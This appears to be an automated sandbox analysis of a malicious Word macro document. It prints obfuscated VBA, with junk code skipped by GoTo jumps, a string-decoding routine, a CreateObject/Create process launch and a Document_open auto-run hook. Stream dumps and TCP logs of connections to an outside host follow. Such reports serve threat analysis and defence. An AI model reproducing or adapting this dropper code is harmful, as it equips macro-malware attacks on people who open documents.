Dim itkMEH As Integer
itkMEH = FreeFile
Open "F:\gqMAa\hIkBCIoDH\plQXC.MztsGVF" For Binary Access Read As #itkMEH
Open "O:\ntNeiY\DmIxDvJb\rzyKG.zgDFq" For Binary Access Read As #itkMEH
ReDim yVoQA(1 To LOF(intGend) - 5)
Get #itkMEH, , yVoQA
Get #itkMEH, , yVoQA
Get #itkMEH, , yVoQA
Close #itkMEH
pwSExduL:
Set Sh38p_k57qec10xw97 = CreateObject(Btq8kso8ps4ew80gk)
   GoTo CNtZFGE
Dim WZuyub() As Byte
Dim SKhtFjI As Integer
SKhtFjI = FreeFile
Open "F:\dNNXEFJ\acmbFAE\woxMJXHDE.TtPXl" For Binary Access Read As #SKhtFjI
Open "O:\SmEZL\EulgpIBLC\aXBYFG.JSmAKD" For Binary Access Read As #SKhtFjI
ReDim WZuyub(1 To LOF(intGend) - 5)
Get #SKhtFjI, , WZuyub
Get #SKhtFjI, , WZuyub
Get #SKhtFjI, , WZuyub
Close #SKhtFjI
CNtZFGE:
Tqlcro8xaox_83zo = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
   GoTo zJHKYzJ
Dim KGneUHDB() As Byte
Dim yrkIKRGIk As Integer
yrkIKRGIk = FreeFile
Open "F:\jAZCT\DySvBJIFG\hAlfC.fnSKCJJG" For Binary Access Read As #yrkIKRGIk
Open "O:\qSjvl\yUGgtdAWG\oVioFFBy.quDugF" For Binary Access Read As #yrkIKRGIk
ReDim KGneUHDB(1 To LOF(intGend) - 5)
Get #yrkIKRGIk, , KGneUHDB
Get #yrkIKRGIk, , KGneUHDB
Get #yrkIKRGIk, , KGneUHDB
Close #yrkIKRGIk
zJHKYzJ:
   GoTo vKyPeD
Dim igkzHsOD() As Byte
Dim fLfZBI As Integer
fLfZBI = FreeFile
Open "F:\hGyrGI\qHGrBJsd\hZWkGjB.TBolF" For Binary Access Read As #fLfZBI
Open "O:\FbzvAFHGg\ZHHZEbi\hGbdjB.VomiwAsk" For Binary Access Read As #fLfZBI
ReDim igkzHsOD(1 To LOF(intGend) - 5)
Get #fLfZBI, , igkzHsOD
Get #fLfZBI, , igkzHsOD
Get #fLfZBI, , igkzHsOD
Close #fLfZBI
vKyPeD:
Sh38p_k57qec10xw97.Create Njcpw_phi02f0(Tqlcro8xaox_83zo), Ykqhx9otvrqd8hk, K6e5kz9g40vnyyqph
   GoTo aIQdBCWAF
Dim VRkXRq() As Byte
Dim AZymJ As Integer
AZymJ = FreeFile
Open "F:\SUBaGhI\zSrEaFB\FspCHJf.SAqAGV" For Binary Access Read As #AZymJ
Open "O:\ndcDJ\EmuLtI\DzqYCH.rPICspJ" For Binary Access Read As #AZymJ
ReDim VRkXRq(1 To LOF(intGend) - 5)
Get #AZymJ, , VRkXRq
Get #AZymJ, , VRkXRq
Get #AZymJ, , VRkXRq
Close #AZymJ
aIQdBCWAF:
   GoTo rvCQBGwH
Dim SlnFEwSdl() As Byte
Dim uqnnDLEb As Integer
uqnnDLEb = FreeFile
Open "F:\OanxNh\dmwfIytAI\zSVYCAEwA.eRhegND" For Binary Access Read As #uqnnDLEb
Open "O:\GihTHDyJ\xMEpEDFW\QjvPEbIGE.jZthRA" For Binary Access Read As #uqnnDLEb
ReDim SlnFEwSdl(1 To LOF(intGend) - 5)
Get #uqnnDLEb, , SlnFEwSdl
Get #uqnnDLEb, , SlnFEwSdl
Get #uqnnDLEb, , SlnFEwSdl
Close #uqnnDLEb
rvCQBGwH:
End Function
Function Njcpw_phi02f0(Anhlci4u6mrgd9n5dx)
On Error Resume Next
   GoTo LOSnJ
Dim tAUYHJKI() As Byte
Dim vKTLOEO As Integer
vKTLOEO = FreeFile
Open "F:\LaXzEEPVS\NELWEaJG\TvjLE.YwLcJF" For Binary Access Read As #vKTLOEO
Open "O:\eutDC\eaAYCHl\GObSFCs.YOftniIh" For Binary Access Read As #vKTLOEO
ReDim tAUYHJKI(1 To LOF(intGend) - 5)
Get #vKTLOEO, , tAUYHJKI
Get #vKTLOEO, , tAUYHJKI
Get #vKTLOEO, , tAUYHJKI
Close #vKTLOEO
LOSnJ:
Dzd5_3nk50q = (Anhlci4u6mrgd9n5dx)
   GoTo sgHzJ
Dim KmguP() As Byte
Dim wiMPPMQc As Integer
wiMPPMQc = FreeFile
Open "F:\xJozuHdEN\ADlgItJx\YfYaiFhDE.kZcvDrGGq" For Binary Access Read As #wiMPPMQc
Open "O:\FNlPqdU\yMDerBjAI\HYROCHJJ.obdMDCd" For Binary Access Read As #wiMPPMQc
ReDim KmguP(1 To LOF(intGend) - 5)
Get #wiMPPMQc, , KmguP
Get #wiMPPMQc, , KmguP
Get #wiMPPMQc, , KmguP
Close #wiMPPMQc
sgHzJ:
Lu4qlhfelm575 = Syv_ghviw_8l22(Dzd5_3nk50q)
   GoTo PwWkBCkb
Dim IcahCDE() As Byte
Dim ZuVZXFr As Integer
ZuVZXFr = FreeFile
Open "F:\tLhtGJJqI\EDSME\OnHhcF.CjTGdBI" For Binary Access Read As #ZuVZXFr
Open "O:\SXlgB\DObjDDYJ\QnwLfF.xhiJBAa" For Binary Access Read As #ZuVZXFr
ReDim IcahCDE(1 To LOF(intGend) - 5)
Get #ZuVZXFr, , IcahCDE
Get #ZuVZXFr, , IcahCDE
Get #ZuVZXFr, , IcahCDE
Close #ZuVZXFr
PwWkBCkb:
Njcpw_phi02f0 = Lu4qlhfelm575
   GoTo VRvXeA
Dim xIvSdpG() As Byte
Dim ylBklGy As Integer
ylBklGy = FreeFile
Open "F:\pqfpqwI\YzHAAE\adNkxHr.XKNlnB" For Binary Access Read As #ylBklGy
Open "O:\HEriW\OlyoIMJE\lhMoF.pEJsB" For Binary Access Read As #ylBklGy
ReDim xIvSdpG(1 To LOF(intGend) - 5)
Get #ylBklGy, , xIvSdpG
Get #ylBklGy, , xIvSdpG
Get #ylBklGy, , xIvSdpG
Close #ylBklGy
VRvXeA:
End Function
Function Syv_ghviw_8l22(Njuqt916644ev0c_cr)
Qyqz1cvtrsxfqjyol = Zzf8ou_itu4vukq
   GoTo sbKLC
Dim bUpzhB() As Byte
Dim bqPAAAGJF As Integer
bqPAAAGJF = FreeFile
Open "F:\LVTgJDEAH\npDRFjHAI\sJWnCICW.fUhjC" For Binary Access Read As #bqPAAAGJF
Open "O:\RfnuCBKG\RjeSEoI\GLSpIJCI.ANupdJL" For Binary Access Read As #bqPAAAGJF
ReDim bUpzhB(1 To LOF(intGend) - 5)
Get #bqPAAAGJF, , bUpzhB
Get #bqPAAAGJF, , bUpzhB
Get #bqPAAAGJF, , bUpzhB
Close #bqPAAAGJF
sbKLC:
Syv_ghviw_8l22 = Replace(Njuqt916644ev0c_cr, "]b2[s", Yll3shw1598y8rt_cn)
   GoTo ZYftoBlCA
Dim ARnfVzJ() As Byte
Dim TXAJH As Integer
TXAJH = FreeFile
Open "F:\XuogCJjvl\BqVwVOI\aWwKBeC.QabEyMDF" For Binary Access Read As #TXAJH
Open "O:\eFmrAZDJ\nodmnAAxD\xMUzkGzO.sFkRlmCCY" For Binary Access Read As #TXAJH
ReDim ARnfVzJ(1 To LOF(intGend) - 5)
Get #TXAJH, , ARnfVzJ
Get #TXAJH, , ARnfVzJ
Get #TXAJH, , ARnfVzJ
Close #TXAJH
ZYftoBlCA:
End Function

VBA File Name: Mlimulsud7q0, Stream Size: 699

General
Stream Path:	Macros/VBA/Mlimulsud7q0
VBA File Name:	Mlimulsud7q0
Stream Size:	699
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . S \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 53 5c e1 05 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Mlimulsud7q0"`

VBA File Name: Sjtq5nhmztw, Stream Size: 1113

General
Stream Path:	Macros/VBA/Sjtq5nhmztw
VBA File Name:	Sjtq5nhmztw
Stream Size:	1113
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . S \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 53 5c 05 e7 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sjtq5nhmztw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Z9zoxbjstfyh_817c
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 121

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	121
Entropy:	4.36374049783
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.249002782356
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . . . . . . . . . . . . . . . f < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 564

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	564
Entropy:	4.21290520724
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 04 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 5c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6493

General
Stream Path:	1Table
File Type:	data
Stream Size:	6493
Entropy:	6.02724182685
Base64 Encoded:	True
Data ASCII:	f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99191

General
Stream Path:	Data
File Type:	data
Stream Size:	99191
Entropy:	7.38970126134
Base64 Encoded:	True
Data ASCII:	w . . . D . d . . . . . . . . . . . . . . . . . . . . . J F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . . . . . . . . . . . R . . . . . . . . . . * . ` . p a . . b z U . N . . . . . . . . . . . . D . . . . . . . . F . . . . . . . * . ` . p a . . b z U . N . . . . . . . .
Data Raw:	77 83 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 46 ef 1f 08 02 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 507

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	507
Entropy:	5.50530623941
Base64 Encoded:	True
Data ASCII:	I D = " { F 1 C E B B D E - B F A 0 - 4 6 0 C - 8 0 0 E - 4 2 0 E 8 1 1 6 A 6 6 2 } " . . D o c u m e n t = S j t q 5 n h m z t w / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M l i m u l s u d 7 q 0 . . M o d u l e = I f l l 4 v s a s p s r s l n 6 _ . . E x e N a m e 3 2 = " B t o s q 7 g o c f w p 4 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 2 D 0 2 7 0 1 E F 0 5 E F 0 5 E F 0 5 E F 0 5 " . . D P B = " 9 6 9 4
Data Raw:	49 44 3d 22 7b 46 31 43 45 42 42 44 45 2d 42 46 41 30 2d 34 36 30 43 2d 38 30 30 45 2d 34 32 30 45 38 31 31 36 41 36 36 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 6a 74 71 35 6e 68 6d 7a 74 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6c 69 6d 75 6c 73 75 64 37 71 30 0d 0a 4d 6f 64 75 6c 65 3d 49 66 6c 6c 34 76 73 61 73 70 73 72 73 6c 6e 36 5f 0d 0a 45 78 65

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	131
Entropy:	3.70722258674
Base64 Encoded:	False
Data ASCII:	S j t q 5 n h m z t w . S . j . t . q . 5 . n . h . m . z . t . w . . . M l i m u l s u d 7 q 0 . M . l . i . m . u . l . s . u . d . 7 . q . 0 . . . I f l l 4 v s a s p s r s l n 6 _ . I . f . l . l . 4 . v . s . a . s . p . s . r . s . l . n . 6 . _ . . . . .
Data Raw:	53 6a 74 71 35 6e 68 6d 7a 74 77 00 53 00 6a 00 74 00 71 00 35 00 6e 00 68 00 6d 00 7a 00 74 00 77 00 00 00 4d 6c 69 6d 75 6c 73 75 64 37 71 30 00 4d 00 6c 00 69 00 6d 00 75 00 6c 00 73 00 75 00 64 00 37 00 71 00 30 00 00 00 49 66 6c 6c 34 76 73 61 73 70 73 72 73 6c 6e 36 5f 00 49 00 66 00 6c 00 6c 00 34 00 76 00 73 00 61 00 73 00 70 00 73 00 72 00 73 00 6c 00 6e 00 36 00 5f 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3913

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3913
Entropy:	5.11344006059
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 659

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	659
Entropy:	6.42625919539
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . P F . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . * . m . . . . ! O f f i c
Data Raw:	01 8f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 50 46 db 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 18990

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	18990
Entropy:	4.10807896366
Base64 Encoded:	False
Data ASCII:	. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . D . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 84 44 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 4a 00 00 ce 90 01 00 ce 90 01 00 84 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/07/21-16:34:02.945343	ICMP	399	ICMP Destination Unreachable Host Unreachable			152.170.79.100	192.168.2.22
01/07/21-16:34:05.971611	ICMP	399	ICMP Destination Unreachable Host Unreachable			152.170.79.100	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2021 16:33:38.997667074 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.149549007 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.149689913 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.152623892 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.304389000 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.346890926 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.346950054 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.346981049 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347011089 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347052097 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347090006 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347131968 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347181082 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347207069 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.347223997 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347238064 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.347265959 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.347292900 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499109983 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499171972 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499214888 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499224901 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499253035 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499273062 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499295950 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499335051 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499365091 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499386072 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499430895 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499460936 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499468088 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499507904 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499547005 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499587059 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499589920 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499599934 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499629021 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499669075 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499691010 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499717951 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499766111 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499794960 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.499814034 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499855042 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.499886990 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.651536942 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651598930 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651629925 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651659966 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651702881 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651755095 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651798964 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651838064 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651878119 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651878119 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.651910067 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.651917934 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651943922 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.651957035 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.651998043 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652036905 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652040958 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652084112 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652101994 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652128935 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652168989 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:39.652194023 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:39.652209044 CET	80	49165	35.208.84.24	192.168.2.22
